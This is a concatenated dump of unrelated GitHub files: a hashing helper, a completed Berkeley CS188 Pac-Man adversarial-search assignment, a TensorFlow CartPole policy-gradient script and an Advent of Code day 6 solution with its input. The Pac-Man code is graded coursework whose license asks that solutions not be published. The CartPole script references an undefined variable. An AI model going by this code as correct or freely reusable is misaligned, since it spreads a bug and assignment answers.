self.result['crc32'] = "".join("%02X" % ((crc >> i) & 0xff) for i in [24, 16, 8, 0])
self.result['ssdeep'] = self._get_ssdeep()
def _get_ssdeep(self):
try:
return pydeep.hash_buf(self._file_data).decode()
except Exception as e:
logging.warn(f"Error: {e}")
return None
@property
def all_result(self):
return self.result
| [
"sasakikung@gmail.com"
] | sasakikung@gmail.com |
6d6a109ccbf23460c3ad9eb778116b871ffe7a8b | a60a742c3856cb60560cc83a668f7dbbdc93b222 | /multiAgents.py | 2a1a95f496edaa56e5f1ca371f573e05a5ab32c7 | [] | no_license | SplashEzer00/CS188-The-Pac-Man-Projects | 906966ad0c371c16b7acd88e63f23f40514dcca6 | ee2576a14efd73062caf57caba7f35981d489544 | refs/heads/main | 2023-08-15T06:55:24.346716 | 2021-09-24T13:34:51 | 2021-09-24T13:34:51 | 406,756,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,610 | py | # multiAgents.py
# --------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from util import manhattanDistance
from game import Directions
import random, util
from game import Agent
class ReflexAgent(Agent):
"""
A reflex agent chooses an action at each choice point by examining
its alternatives via a state evaluation function.
The code below is provided as a guide. You are welcome to change
it in any way you see fit, so long as you don't touch our method
headers.
"""
def getAction(self, gameState):
"""
您不需要更改此方法,但欢迎您这样做。 getAction根据评估函数在最佳选项中进行选择。
就像之前的项目一样,getAction接受一个GameState并返回一些方向。对于集合{NORTH, SOUTH, WEST, EAST, STOP}中的某个X
"""
# Collect legal moves and successor states
legalMoves = gameState.getLegalActions()
# Choose one of the best actions
scores = [self.evaluationFunction(gameState, action) for action in legalMoves]
bestScore = max(scores)
bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]
chosenIndex = random.choice(bestIndices) # Pick randomly among the best
"如果您愿意,可以在这里添加更多代码"
return legalMoves[chosenIndex]
def evaluationFunction(self, currentGameState, action):
"""
在这里设计一个更好的评估函数。
评估函数接受当前的和建议的后续GameStates (pacman.py)并返回一个数字,其中数字越大越好。
下面的代码从状态中提取一些有用的信息,比如剩余的食物(newFood)和移动后的吃豆人位置(newPos)。
newScaredTimes提供了每个幽灵会因为吃豆人吃了能量球而保持恐惧的移动数。
"""
# Useful information you can extract from a GameState (pacman.py)
successorGameState = currentGameState.generatePacmanSuccessor(action)#生成指定pacman移动后的后续状态
newPos = successorGameState.getPacmanPosition()#得到吃豆子的位置
newFood = successorGameState.getFood()
newGhostStates = successorGameState.getGhostStates()#获得鬼的位置
newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]
#Mycode
newFood = successorGameState.getFood().asList()#获得食物的位置
nearestFood = float('inf')#初始化最近食物距离为正无穷
for food in newFood:
nearestFood = min(nearestFood, manhattanDistance(newPos, food))#取最近食物和xy1和xy2之间的曼哈顿距离的较小值
for ghost in successorGameState.getGhostPositions():
if (manhattanDistance(newPos, ghost) < 3):#如果离鬼近,评估函数则返回负无穷
return -float('inf')
return successorGameState.getScore() + 1.0/nearestFood#离食物越近,评估函数越高
def scoreEvaluationFunction(currentGameState):
"""
这个默认的评估函数只是返回状态的分数。 分数与在吃豆人GUI中显示的分数相同。
这个评估函数用于对抗搜索代理(而不是反射代理)。
"""
return currentGameState.getScore()
class MultiAgentSearchAgent(Agent):
"""
这个类提供了一些公共元素
多智能搜索。这里定义的任何方法都是可用的
到MinimaxPacmanAgent, AlphaBetaPacmanAgent和ExpectimaxPacmanAgent。
您*不*需要在这里做任何更改,但如果您想为所有对抗性搜索代理添加功能,则可以。但是,请不要删除任何东西。
注意:这是一个抽象类:一个不应该实例化的类。它只是部分指定,并被设计为可扩展的。Agent (game.py)是另一个抽象类。
"""
def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):
self.index = 0 # Pacman is always agent index 0
self.evaluationFunction = util.lookup(evalFn, globals())
self.depth = int(depth)
class MinimaxAgent(MultiAgentSearchAgent):
"""
你的极小极大代理(question 2)
"""
"""
使用self.depth和self.evaluationFunction从当前游戏状态返回极大极小动作。
下面是实现minimax时可能有用的一些方法调用。
gameState.getLegalActions (agentIndex):
传入的参数 agentIndex = 0 表示吃豆人,>= 1 表示幽灵,表明不止一只幽灵
gameState。generateSuccessor (agentIndex, action):
在Agents执行操作后返回后续游戏状态
gameState.getNumAgents ():
返回游戏中agents的总数
gameState.isWin ():
返回游戏状态是否为获胜状态
gameState.isLose ():
返回游戏状态是否为失败状态
"""
def getAction(self, gameState):
actions = gameState.getLegalActions(0)
return max(actions, key=lambda x: self.minimaxSearch(gameState.generateSuccessor(0, x), 1))#选择吃豆人与MINMAX算法的较优操作
def minimaxSearch(self, gameState, turn):#MINMAX算法
numOfAgents = gameState.getNumAgents()#游戏Agents总数
agentIndex = turn % numOfAgents#计算角色轮转
depth = turn // numOfAgents#计算深度
if gameState.isWin() or gameState.isLose() or depth == self.depth:
return self.evaluationFunction(gameState)#进行评估
actions = gameState.getLegalActions(agentIndex)#吃豆人下一步
evals = [self.minimaxSearch(gameState.generateSuccessor(agentIndex, action), turn + 1) for action in actions]#递归
if agentIndex > 0:#一对多MINMAX算法,
return min(evals)
else:
return max(evals)
class AlphaBetaAgent(MultiAgentSearchAgent):
"""
你的极小最大值代理和α - β修剪(question 3)
Returns 使用self.depth和self.evaluationFunction实现极大极小动作
"""
def getAction(self, gameState):
actions = gameState.getLegalActions(0)#合法行动
alpha, beta = -float('inf'), float('inf')#初始化
vals = []
for action in actions:
val = self.alphabetaSearch(gameState.generateSuccessor(0, action), 1, alpha, beta)
alpha = max(alpha, val)#记录最优值
vals.append(val)#合并
for i in range(len(actions)):
if alpha == vals[i]:
return actions[i]#返回最优解
def alphabetaSearch(self, gameState, turn, alpha, beta):
numOfAgents = gameState.getNumAgents()#获取agents个数
agentIndex = turn % numOfAgents#记录角色
depth = turn // numOfAgents#记录深度
if gameState.isWin() or gameState.isLose() or depth == self.depth:#跳出条件
return self.evaluationFunction(gameState)
actions = gameState.getLegalActions(agentIndex)#记录动作
if agentIndex == 0: val = -float('inf')#记录alpha/beta(跟当前agent类型判断)
else: val = float('inf')
for action in actions:#行动
successor = gameState.generateSuccessor(agentIndex, action)
#alphabeta算法
if agentIndex > 0:
val = min(val, self.alphabetaSearch(successor, turn + 1, alpha, beta))#记录beta
if val < alpha: return val#剪枝
else: beta = min(beta, val)
else:
val = max(val, self.alphabetaSearch(successor, turn + 1, alpha, beta))#记录alpha
if val > beta: return val#剪枝
else: alpha = max(alpha, val)
return val
class ExpectimaxAgent(MultiAgentSearchAgent):
"""
你expectimax代理(question 4)
Returns 使用self.depth和self.evaluationFunction来实现expectimax动作
所有的幽灵都应该被建模为从它们的合法移动中一致随机选择。蒙特卡洛树搜索?
"""
def getAction(self, gameState):
actions = gameState.getLegalActions(0)
return max(actions, key=lambda x: self.expectimaxSearch(gameState.generateSuccessor(0, x), 1))
def expectimaxSearch(self, gameState, turn):
numOfAgents = gameState.getNumAgents()#获得agent个数
agentIndex = turn % numOfAgents#记录角色
depth = turn // numOfAgents#记录深度
if gameState.isWin() or gameState.isLose() or depth == self.depth:#跳出条件
return self.evaluationFunction(gameState)#返回评估函数
actions = gameState.getLegalActions(agentIndex)#记录行动
evals = [self.expectimaxSearch(gameState.generateSuccessor(agentIndex, action), turn + 1) for action in actions]#递归
#蒙特卡洛树搜索
if agentIndex > 0:
return sum(evals) * 1.0 / len(evals)#返回期望值(平均值)
return max(evals)#返回最大值
def betterEvaluationFunction(currentGameState):
"""
你极端的捉鬼,抓丸,吃东西,不可阻挡的评估功能(question 5).
"""
if currentGameState.isLose(): return - float('inf')
if currentGameState.isWin(): return float('inf')
foods = currentGameState.getFood()#获取食物位置
ghostStates = currentGameState.getGhostStates()#获取鬼位置
pacmanPostion = currentGameState.getPacmanPosition()#获取吃豆人位置
nearestFood = min(manhattanDistance(food, pacmanPostion) for food in foods.asList())#获得最近食物的分数(曼哈顿距离越近越高)
coverMe = sum([(manhattanDistance(ghost.getPosition(), pacmanPostion) < 3) for ghost in ghostStates])#获得鬼的个数(距离<3)
scareMe = sum([(ghost.scaredTimer == 0) for ghost in ghostStates])#获得惊吓时间分数(越久越大)
#最近食物的分数越小,更好评估函数返回值越大;鬼的个数越少,更好评估函数返回值越大;鬼的惊吓时间越长,更好评估函数返回值越大;
return currentGameState.getScore() + 1.0 / nearestFood + 1.0 * coverMe + 1.0 / (scareMe + 0.1)
# Abbreviation
better = betterEvaluationFunction | [
"noreply@github.com"
] | SplashEzer00.noreply@github.com |
698189883b7b106d39274401989489fd5d95863e | 030ce47c6bd752807f14dc0c058f4b2395fcb7a2 | /CartPole_v0/PolicyGradient.py | 114026f09677ffb941f476f2c8aad12778e86185 | [] | no_license | chiaminchuang/ReinforcementLearning-GYM | c7b8553443c929eb338d96cafed136e25f99c4ce | c0601786ceab1a4dec51dffb374b8b770f0f8590 | refs/heads/master | 2020-06-16T14:45:34.487065 | 2019-07-07T05:22:46 | 2019-07-07T05:22:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,882 | py | import tensorflow as tf
import gym
import numpy as np
env = gym.make('CartPole-v0')
num_actions = env.action_space.n
num_inputs = env.observation_space.shape[0]
def create_model():
hidden_units = [4]
x = tf.placeholder(tf.float32, shape=(None, num_inputs))
y = tf.placeholder(tf.int32, shape=(None, ))
h = x
for units in hidden_units:
h = tf.keras.layers.Dense(units=units, activation='relu')(h) # (batch_size, hidden_units)
# h = tf.keras.layers.Dropout(0.5)(h)
o = tf.keras.layers.Dense(units=num_actions, activation=None)(h) # (batch_size, num_actions)
probabilities = tf.keras.activations.softmax(o) # (batch_size, num_actions)
action = tf.multinomial(probabilities, num_samples=1) # (batch_size, 1)
y_onehot = tf.one_hot(y, depth=num_actions) # (batch_size, num_actions)
cross_entropy = tf.losses.softmax_cross_entropy(y_onehot, o) # (batch_size, )
loss = tf.reduce_mean(cross_entropy) # ()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
gradients_and_variables = optimizer.compute_gradients(loss)
gradients = []
gradient_placeholders = []
grads_and_vars_feed = []
for gradient, variable in gradients_and_variables:
gradients.append(gradient)
gradient_placeholder = tf.placeholder(tf.float32, shape=gradient.get_shape())
gradient_placeholders.append(gradient_placeholder)
grads_and_vars_feed.append((gradient_placeholder, variable))
training_op = optimizer.apply_gradients(grads_and_vars_feed)
return x, y, action, gradients, loss, gradient_placeholders, training_op
def helper_discount_rewards(rewards, discount_rate):
'''
Parameters:
rewards: (game_steps, ). reward for each round
Return:
discounted_rewards (game_steps, ). discounted reward for each round
'''
discounted_rewards = np.zeros(len(rewards))
cumulative_rewards = 0
for step in reversed(range(len(rewards))):
cumulative_rewards = rewards[step] + cumulative_rewards * discount_rate
discounted_rewards[step] = cumulative_rewards
return discounted_rewards
def discount_and_normalize_rewards(all_rewards, discount_rate):
'''
Parameters:
all_rewards: (num_game_rounds, game_steps). rewards for each iteration.
Return:
all_discounted_rewards: (num_game_rounds, game_steps). discounted rewards for each iteration.
'''
# calculate discounted rewards
all_discounted_rewards = []
for rewards in all_rewards:
all_discounted_rewards.append(helper_discount_rewards(rewards, discount_rate))
# normalize discounted rewards
flat_rewards = np.concatenate(all_discounted_rewards) # (num_game_rounds, game_steps)
reward_mean = flat_rewards.mean()
reward_std = flat_rewards.std()
return [(discounted_rewards - reward_mean) / reward_std for discounted_rewards in all_discounted_rewards]
if __name__ == '__main__':
num_game_rounds = 10
max_game_steps = 1000
num_iterations = 300
discount_rate = 0.9
########## Create Model ##########
model_x, model_y, model_action, model_gradients, model_loss, model_gradient_placeholders, model_training_op = create_model()
########## Train Model ##########
with tf.Session() as sess:
initializer = tf.global_variables_initializer()
saver = tf.train.Saver()
sess.run(initializer)
for iteration in range(num_iterations):
print('On Iterations: {}'.format(iteration))
all_rewards = []
all_gradients = []
all_x = []
all_y = []
for game in range(num_game_rounds):
current_rewards = []
current_gradients = []
y = []
observations = env.reset()
score = 0
for step in range(max_game_steps):
# env.render()
fetches = [model_action, model_gradients]
feed_dict = {model_x: observations.reshape((1, num_inputs))}
action, gradients = sess.run(fetches, feed_dict)
observations, reward, done, info = env.step(action[0][0])
current_rewards.append(reward)
current_gradients.append(gradients)
x.append(observations)
y.append(action[0][0])
score += reward
if done:
break
print(score)
all_rewards.append(current_rewards)
all_gradients.append(current_gradients)
all_x.append(x)
all_y.append(y)
all_discounted_rewards = discount_and_normalize_rewards(all_rewards, discount_rate)
feed_dict = {model_y: all_y}
for var_index, gradient_placeholder in enumerate(model_gradient_placeholders):
# mean_gradients = np.sum([(np.sum(rewards) - 70) * all_gradients[game_index][step][var_index]
# for game_index, rewards in enumerate(all_discounted_rewards)
# for step, reward in enumerate(rewards)], axis=0) / num_game_rounds
mean_gradients = np.mean([reward * all_gradients[game_index][step][var_index]
for game_index, rewards in enumerate(all_rewards)
for step, reward in enumerate(rewards)], axis=0)
# print(mean_gradients)
feed_dict[gradient_placeholder] = mean_gradients
sess.run(model_training_op, feed_dict=feed_dict)
saver.save(sess, 'models/PG/model')
avg_score = 0
for i in range(20):
observations = env.reset()
with tf.Session() as sess:
new_saver = tf.train.Saver()
new_saver.restore(sess, 'models/PG/model')
score = 0
for x in range(500):
env.render()
fetches = [model_action]
feed_dict = {model_x: observations.reshape((1, num_inputs))}
action_val = sess.run(fetches, feed_dict)
# print(action_val)
observation, reward, done, info = env.step(action_val[0][0])
score += reward
if done:
print('Your Score Is: {}'.format(score))
avg_score += score
break
print('Average Score: {}'.format(avg_score / 20))
| [
"noreply@github.com"
] | chiaminchuang.noreply@github.com |
4e964a168e5f724e7c1aec26b7edf1bea0d54e5f | 2aa70d0c4e7108b3c6cf31d65b82d09036538cc3 | /2020/day_06.py | b27403dca973fdaef8ba5513a473f79282c43cec | [] | no_license | charlch/Advent-of-Code | 123400a2a14c3c4070a5ffb827a2a89d8f7296d5 | cdf4247ca6d2460a53ee90a6bba5e218e2163652 | refs/heads/master | 2022-12-22T01:54:36.195014 | 2022-12-18T12:07:55 | 2022-12-18T12:07:55 | 225,406,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,893 | py | print("Day 6")
data="""abc
a
b
c
ab
ac
a
a
a
a
b"""
data="""lznroxbqymvfijpwkec
gljkpwyvsbmroziefnqxc
bmkiewyxjfzqrocnlpv
ibewnmlkzfcrjyvxopq
fkmxpbvjiwlrzocqyne
khicbaxyvmlgorz
baonifgtlkrmcxhzv
albmyvgrihxkzoc
vmcizkpglyoarxbh
mxrufizdpe
tmowfuynajqlivhgskrcb
xwqpuirsmaoyldgbzft
odlyigpqsmbvtzauxr
aymdshiprbguoqzxtl
zdylrimtjpxeosaqubg
tlbzigadxkoqnurcsmyp
jadtruwhinqog
vitasqdnoeghjwuz
aigqhdowjsetun
unhqwogdjait
om
oep
vknfwpuzisty
tzifluwnspv
wispvfntuz
znupcl
lcnpuz
lkuznecp
pczunlx
nzubclp
cunfkismz
lbhypaje
ro
myo
ngwefiutvszxbdmryocplqj
sdljcutwzfxemvgnipo
dxfvrgszlbyaunp
gzrlauvfnybps
yvpfabmuszgjrnl
nlzpfasgbyvur
lsognzftikxjbvayuh
ftxzgjaiobhuvlskny
hfuzvglsxjobayknit
nuxvtqbsaiojkhzfylg
novbjasyhkftlugxzi
vxbhjmpzsrfoankywdeiltuq
emayhruvfpsqbkxdznjtil
ikafqsbvdjymxrhueztpln
fixjrzesulhpmadkytnvbq
rkejpiztmvyxfaqbuslhnd
ejmyzlibckwoah
masohifbqjgleywcrnz
lhouzrkenvgtqwydmajs
kngayjteqsczmwdurlhbo
ptf
pzft
ptf
pstf
f
f
f
f
f
algfqpwh
pdhabkw
jyxmcrnlkadzvhuo
lokmdcvyatqengjrz
sbrynopviejlwdzmkcfa
qjl
qljv
qlj
jlq
zwvucilrjkqtaposybefhxd
yvhrnfjzudoxatpqbilcke
mhfioakqexutdybcrvljgzp
lw
vlw
dslpbnkxmqeywajgz
gdxnywsqelmzbjkpa
laynbksqxgdpewmjz
lnaxmyjgzdewkqpbs
gmenasxzldywjkqbp
ibqosazldjcgpn
cdzslogaiqbjnp
vdjlbzyrqctgpnias
faclbinzpjsqgd
zrpsnfkce
vzsipnkcfe
kcfdepns
lfcpywnjaektsh
enspkrcfq
sodaxyhewlrntpqizfk
fcnrshpzowtyid
dopucjibnfszrymwth
dgftsryzwohinvp
wnaslokrfxjbdehmitzqvu
undqlzakofjsxmewtvbhir
onsrawtufdvlqeihxjzbmk
eokxgvqzilrtmahujdfsnbw
asmtkequ
sgmt
lkfbheti
tmhufgnqadxl
xnhgefy
lxhkpmng
agcnhx
dciwfxz
repwdbt
wudi
zkxswfdam
m
md
i
trjihfdulyap
splmgabkrt
ogpy
whvecnqi
us
txsrojkd
jbkpaz
r
r
zsvn
nszv
znsevb
ndszv
znsv
ermqlnsctupxwbozvfajykig
zgvfosexuympqlbcikjnwatrh
mtzylsxbqufecrpkwgvaiojn
gnktmeocvflzaypqwbxuisrj
jrnmtuihb
ldkp
d
fgtermukvqhbjw
kgfeywtbzuhvqjr
pyr
y
wdxksjutzpefaimlgvcn
gxaijdslbwpvuntcemfo
xhek
bhcky
syhqk
gtfzma
tafm
xlwvzdaj
vzjlpwdxa
jdtvwzlxa
wuhipnmfkgyt
hqjfsnxkurpi
mrpieq
erhmipq
qprmei
xylkdcpiqsbtfaughnm
mnfhdwubcaktsqgxyi
rfbmxscigauhdynktzq
subdykxqatmgifehnzvwc
xdmbgwiksrvy
xgbkdiyrvsw
wxvdgrksyib
xkhibslqdgwyvr
rvgydbmwiskx
zyjkdunfomiwsrb
wupjxhrckyalgeq
lwvmg
lmgvw
lgwvm
lvmgw
vmlgw
pqmwrcbfsuvlz
qgyl
qhaeducybxtioswzknpmflrjv
roqyhvibtflxjwzpmukcesdan
fabhcserviuw
uvebswrfchia
wvhafbrsuice
ylebqivmkjo
ivqljkbeyom
qyblvkojime
lmeqkijvoyb
i
i
i
i
bdxmkngyctjs
mjxdcksybgnt
cdmskgbnxtyj
xjcmbtygvnsdk
pwyvm
pvmyw
pyvwm
yombwpv
pfkldvqeoragwnybhcxm
ycbwxmvqunafjdpeh
pasdjqbhxnvfewycm
ahyepmvtcbfqwxdn
wzbvnoglayjmxcqkdefus
rwbfzmgctaelounvyqjs
gteswk
kwget
uoetgwky
jsfvz
f
naexsokztq
txenoqksza
kzoaxqtnse
etoaxsqzkn
stokeaznqx
i
s
muksvphjrqiwytcgeazdox
maqjtecgzordhswpxkvu
pagxzrdojuqtkwvmshce
cretaokjdwvhqpzmusxg
gvjpoxdezuhacqtrwksm
axtz
xzta
xazt
aztx
uphinta
hiutfpna
hptauin
autiphn
dnmicvtsfyaexhql
mdvyqlaeihxtcfsn
qxfcmvhaiensdtyl
hminsdcelqfvxayt
iftydesxhvalnmcq
bdugalfnrswiexzhv
dtorqhzulej
utypg
ypvjqtg
htbdpyv
yfrzptxw
gvyotp
glinqmfhkejtwsdpoz
sytgdefiohwvqnpzlajkm
gejwmtizspkdnfloqh
pgisoqletmkcdjnhzfw
getzrjoashy
wzyrhaesj
ntlearqfpgivudyckbhzx
lbpxnwgvfdtyrcquiehz
pzyfarleghcqnbtvuixd
y
yf
y
rgwiuk
uqdwkcxryt
krwu
ukwr
husrzwkb
ltbkq
bqlkt
qklixtb
opqjnigbv
jignpb
gnoijb
juhgylzeinb
ysdmtbolh
dmshlybot
odhbsmlyt
myohlbdts
holbanvctjrp
hprtbcvonalj
bhvrtclgojanp
blthajvrnpoc
sqxnujfhwibzgly
nomtivzqdbpek
clhgwbe
bchlep
qfztknilhrjvudw
emcpsxijanfbohz
yi
f
f
k
k
ozgbi
ingzo
ozigb
wygmekiqarlzodj
gioz
dwjgzayoxt
ztgmdywax
uynzextlgaidr
kgdtayxsz
jyzgtaxd
onhwlfjvutsgdieqbkpcaz
pduvntkegbjzfahwlqcosi
gczlbundyhijaepwqvokfts
woisjtgcpvbafnzqludehk
iobqnafdcthuzjvwseklpg
pnzvemwjtuqrbk
jpzimrwbqnuevkt
palmebjxigdqf
eaquifmjldgx
efbgilqxamjd
gfdixealzmoqj
jmtefqldgaix
v
vg
gbzxjiqlncvwermsykouahfpd
pcqznbdrmvoygxkwjfiauhlse
baodlefwjvrqmkupixhygzncs
yielbrgwndxhcaokvzpsqmujf
xfizdlocvgyjsawprubnq
xpgsmlbwovncauiyjfqdhrz
crsbaiwydzglfqvpjounx
wqkcuvjobdxfparsylgnzi
alevm
alhem
cgamelb
laem
ahmle
plsroqxcdwgnif
wlidgnqfpxcsr
xqrdisflnwpjgc
wndpicgxsflqr
wdlfrioxcpqsnmg
racgwm
wagcrm
wgrmac
ukpjsmecdzhqrf
pguzdhxqj
tyipuhzdjqavb
qdzlhwjbpuv
yjfzasnudectpwogri
rbfnjwysvioegpakqudzc
icgrxnfdlwuosahemypz
tvxjqhykae
eylhkdzvtjxcbafg
ykejtaxvh
jktxhevay
kyvhtejoax
co
wf
kivymhdufeqng
cbqdheuoa
bwngdclequvktmfxhspzoria
djxbqcutoysngwlvefkmrahpzi
lxcdsnbtufgziqpkermowhav
tiwlmhonvbxakupczredgfsq
wtdefvnmrzsxlqacgobkupih
bxrcpmiztyqd
pbmcx
xmpcbe
mpxbc
ayvxwrcleznfgumst
slcvaugmywnrxfzkte
juymvptzgasxnlrfwce
ymnesdwalzcxvfrutg
pbzheiuvcftm
zvuebmhpcf
fhzpuebcqmxv
zbqplxehvcmfu
ezbmfhcvup
tohicqmx
hmitqofc
qtiocmy
fhoqrbicm
qcdmoin
hwlfdrqpxzc
fvaxghb
eyoskujmnt
bpeqfhocrkdlmjxy
xpmbqfeourcjdhkyl
bxkqjydpholmcfre
orxqpydlcejhfbkm
fzmohvgjnqtukrwxdsiclbpye
qxdbojrpevcnhizslutgkmfwy
pumcrjzwhiyqknsoadegflbtx
x
x
x
x
xrjoylduagqevnhpst
zhtuiqnysorebvgjp
ogysvweiqfd
ivwdosrgyq
ofgiqvydws
giyzxvwmnoudbas
zvkjeyr
jvehkyp
yvhkemj
evylxkj
zlkopmndbahetxru
uwktlbdomjxa
fmxlugbtkjd
subcxyvdkqitml
rzpwoycbevqlgjkais
ybazpqnuoswivgjkex
bkwypqa
qakybp
pkbyaq
znywvqolt
znywovqlt
znodtqlywv
vzotrnwyql
vytonqlwz
ckxlpjsvnf
lpnsjcxvfk
ucklvjfaspn
penkjixvclsf
klcnjfvpxs
jtepn
npejt
bjtepn
qjnpet
enjtp
yeqbd
eyqb
baqye
ybqe
nqio
qniog
ofgincq
eonvqi
hxtklwpfdojynbcva
lokyhscijfpnabvxtw
jxzbhdfmstgrneo
xeordzmfnghtsbj
rnmjzhxtgodbesf
fjmgnedszothbxr
trjmnfohesxdgzb
hqslympetxkibvfnjcw
vloudtrbgyznjai
ynrlpshmkzgfixjoc
hjlprmycfdibwnxkzgo
grilyhjanmtfqkepuxcz
zkpgrbfhxijynmlc
nxcgdm
bdmnjxg
xmgnd
nmxdg
nxmdg
mvrglcyiouxzbwkten
ezpbuqswtgflax
qutenswlmkcpxyojf
xosnwgtemrcjayuqlfp
fetwknupljyscxomq
dtm
t
tu
mt
xpydvgrqtzni
hjrnpytzviqg
evmtrqbapngyz
qntgxvrpyz
ypnvizkqcgrt
yseiov
owech
wimkqg
cyfkmu
dixolbvzqrsmkngchyw
fcxmntrhqiywzoplg
xkywriavgscpzojfmqld
fpwgshaulqojidzrxmecyv
ifvlnyamdoqrxcjwzsgp
eucon
ceak
cxzgfet
enirbc
orcel
webdsv
wvsbe
swcvbe
ewsohvzajicx
sevfgmoja
stearbovdmj
axnguqohjryzdctepwklvbf
dkcofwzhapnlmxtujbegqrv
jcxfvsanwihekulprobgtdzq
jhrcozflwenkdbpyaxvtguq
rlewujhcpngqkxbdtozvfa
xagvlwqd
vwgdylaq
dblaiqwgv
qlargvjwd
wqldvag
pqdwyontbigjuxreh
owxgrpqnaiuteb
pteiubxogrqfwn
wluvsydimgkhajen
welkivzdgsmouhaj
otkpyhg
hykgot
thokyg
thokgym
emxigrtuvopkcdfbqy
yfqxotgecimuvp
epmtquxgicovlyf
tfiqvxpmyegouc
poefxyvgtjmiqcu
bqo
f
o
s
mjwb
bm
bm
mb
uf
upf
uf
hj
jh
jh
jh
jh
gzryfascidjxh
cehvodsgakqx
zieswmajyohcbqpx
ftdjszwyrnaxhkcb
oxqrnim
movrpnq
omanqukr
qgomsnauryxz
sez
iesz
sez
sze
rotfxvuakil
lstfikxqh
ytjpcefx
qvjmgnrzlaktidcwfoeyb
jintwomkrfedyapbzglcvq
iwjldonrvgtaqzkbfemyc
cveodbrzgfxaqnwymltjhki
idkgtyulwcbzaqovjrmfne
dienhzus
zniuhles
iqnezuhs
zhncseiu
shuiezn
hjznyixqtvpfc
xacirus
ebicux
qlkwrhft
bxgr
obgcsnuvhtkrqzjwd
ozdtrhvnucbwgjkyqs
qgvnrwbkudtszohcj
bqzkvgocturwnjsdh
hkjgqsrvzwbnudtco
uefxdgbzmpwaqcijltryhsk
xhuqzjrimeswdklfpt
nqjfewuhtmksizprlxd
vgjnp
vgjn
jvndg
ojwuqzkbmicagn
rzbkwjalotqfng
npkbyqavjgzdwo
kmqoapifvtdj
vfjtpdamqoik
avoidxfmpjkqt
vadistqfmkxpjo
fiqetmoawpjdrkv
dckjnl
cgmenlydujk
lktjgcru
maclgkje
kcoljvzwfbxip
gpjl
iprbgl
otvhqzerlyaujgmnc
ochwnerugqy
iepxgnhcbusdqrfo
ptd
dxt
t
ut
nfijtkag
sgwbckhifomlujapdqty
mzrauwfexjvqhnp
gaeqcjwmbvxdfoshku
kvjacqyblnroifzhmpsdtu
snbipuqjvzctxeak
dzktbyirsaejmnouq
neukjtqbazis
qtbukanzjeis
nqtbzixekfcjasu
ndthqsfbmrjewkizolcaupyx
zcvpdyijbrlwukoxtfhsnqmea
pyzmtlbhrugiansjxdwfqkeco
fkmztiqjbsoahrnxelcudywp
uqwmbntlaiedyfhjrcsozxpk
swf
wsf
fws
pylmrdzqcfkheai
sutfpgvnombwx
zoymuqdtwnlepfc
coldftwqenzypm
vpoyzcdhlqmewtfn
nofzqyhdmclptkew
tenrpqywldcazxomf
nmjbidsagxlv
jzvxndgml
tfrjvqhdumolexc
mdjslxv
obeit
gpc
cru
wduxj
wcxjd
wgkbjnh
jdies
e
by
by
by
yb
v
v
dv
v
v
urwztvnydg
utdvgyzw
ztudvygwi
wtgvryzeud
dteyugwvz
w
w
wj
frnqtxauwhjm
jxtahqfnmkewurg
anmjurtfxqhdw
tjnxwmiuaqlrfh
emnjhwtrafuxbq
vgxoswfbiau
caobkxwgsvif
ovsyafgdbiwx
baqodwgvfxis
wadgsifxvbo
f
ltc
j
lcf
wjvyqcr
vjwqcyr
wjrqvmyc
qwvjrcy
jutzxfmikywse
jozticyxewdq
czeiltwjgnxyq
ctejywpqshzximvln
tpncexjlyhwvsmiqz
vspytcwmlhznjxqei
czxnahseitmy
ecnmtasihxy
bhltqnfx
hbtfxlqn
lfqntbxh
snbhtyqflx
txhnbfloq
wjq
keyuntrvxjhzla
qjgm
dj
tsmgrnh
omnsht
zytlxkasmnhqw
fetgshnm
mhrfdstne
pwltrqjzasxecbymikgv
xwzkbvsptgcalremijyq
ropziwxqtkmvelgayjbcsu
sxjapleiwzvmqgbyrtck
nrdgyhlkafzec
wfqzprgyekhl
oevkhbrytlj
ofyszptied
lvknfazwydp
lpdfzyg
deisyavhcrobz
oebridchamvsy
bihdacjrvoyse
ieorhabcyvds
qpo
opq
qpo
kowxye
ewk
ebuw
jew
jewnk
zma
amz
mza
mrzua
zma
gbjnofwepatird
rtlhjdpoewfbi
cjwibpzodmxtref
tjrdbeofipwv
knblqihwtyrvudpcj
uonmrkaxlcivdqybph
clxbgnipvhkrdquy
eupsyfqkjwlhn
leqpjyfknhs
lysnfjhkpe
ghnympekzslfj
okzfb
obzk
ozgkb
j
j
wscmbevigl
mlsbviecg
vigmslbce
cmgbviels
bgiecmvls
ihvla
znxhmqi
hikrl
hi
ujnqvrfpmkbzhxodiys
bzriqeufxvsmhjoyncwpd
vgtxozijuhnpfdalymbr
tsnaqeofkjmz
sywmloigkb
lmhobusck
kvylwnrg
kvlgrwn
vlgnrwk
gkrvwnl
kxugrsjonbhye
kbuxseonhyrgj
uhnkregsyoxjb
uorgbehxysnkj
advzsqg
qrxmfcag
nqgwayzevd
puwnjhel
jolweuhnp
lnwipueqhj
zun
vp
y
ogauy
zfguoa
qcnpemx
mpeqxc
dmecxqtp
aph
rpha
hasp
aph
pah
iwqlboj
wijolbq
oqilrbjwf
inobjqlw
sxv
yvx
jwkegcvosnfdzat
fjbktsndozac
fjoxave
xnfvao
vfaxo
vxoaf
bfcuamhkglwziyjtr
tgblomxfisvnck
gwvksbd
wkprbs
bkslv
kbthasmf
dlkrgbs
epczdwhmbvxtqj
uzxwmvchbqejd
bmexqiwzhujvcd
jzvtleoniaudwkpcgfmsqy
ctifjxaknmvlypguzeqod
qjmkyn
ahjygqo
yowhmuq
fvzdcrxqytb
ig
ig
ig
gaui
gi
tpdkcloqanbhgruyzwveji
tachrljnpevwyzigksbduqo
tjuzackylwdqeonpgibhvr
cinujltpvrdeskozgahwfybq
ewpkgcubazhrjxiytnolqdv
nxkqbayoclt
odykbnt
tofvbykin
kyotdvbn
kotbyn
